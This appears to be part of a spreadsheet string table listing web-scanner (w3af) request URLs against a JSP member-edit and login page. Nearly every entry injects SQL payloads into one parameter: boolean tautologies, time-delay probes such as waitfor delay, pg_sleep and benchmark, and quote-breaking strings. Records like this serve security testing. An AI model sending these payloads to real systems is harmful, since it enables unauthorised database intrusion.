    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=19"+or+"19"="19&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=19"+and+"19"="20&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=19'+or+'19'='19&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=19'+and+'19'='20&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=19+or+19=19+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=19+and+19=20+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1;waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1);waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1';waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1');waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+benchmark(2500000,md5(1))&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+pg_sleep(5)&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+pg_sleep(5)+or+"1"="1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64"+or+"64"="64&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=64"+and+"64"="65&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=64'+or+'64'='64&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=64'+and+'64'='65&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=64+or+64=64+&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=64+and+64=65+&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1;waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1);waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1';waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1');waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+benchmark(2500000,md5(1))&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+pg_sleep(5)&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+pg_sleep(5)+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+pg_sleep(5)+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=48"+or+"48"="48&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=48"+and+"48"="49&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=48'+or+'48'='48&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=48'+and+'48'='49&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=48+or+48=48+&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=48+and+48=49+&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1;waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1);waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1));waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1';waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1');waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1'));waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1+or+benchmark(2500000,md5(1))&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1+or+pg_sleep(5)&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1'+or+pg_sleep(5)+or+'1'='1&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=1"+or+pg_sleep(5)+or+"1"="1&amp;provincia=24&amp;login=56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56&amp;email=77"+or+"77"="77&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=77"+and+"77"="78&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=77'+or+'77'='77&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=77'+and+'77'='78&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=77+or+77=77+&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=77+and+77=78+&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1;waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1);waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1));waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1';waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1');waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'));waitfor+delay+'0:0:5'--&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+benchmark(2500000,md5(1))&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+pg_sleep(5)&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+pg_sleep(5)+or+'1'='1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+pg_sleep(5)+or+"1"="1&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=89"+or+"89"="89&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=89"+and+"89"="90&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=89'+or+'89'='89&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=89'+and+'89'='90&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=89+or+89=89+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=89+and+89=90+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=1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24&amp;login=1)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24&amp;login=1))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24&amp;login=1'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24&amp;login=1')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24&amp;login=1'));waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=1+or+benchmark(2500000,md5(1))&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=1+or+pg_sleep(5)&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=1'+or+pg_sleep(5)+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=1"+or+pg_sleep(5)+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0)"()'))"('&amp;pwd=frame30.&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
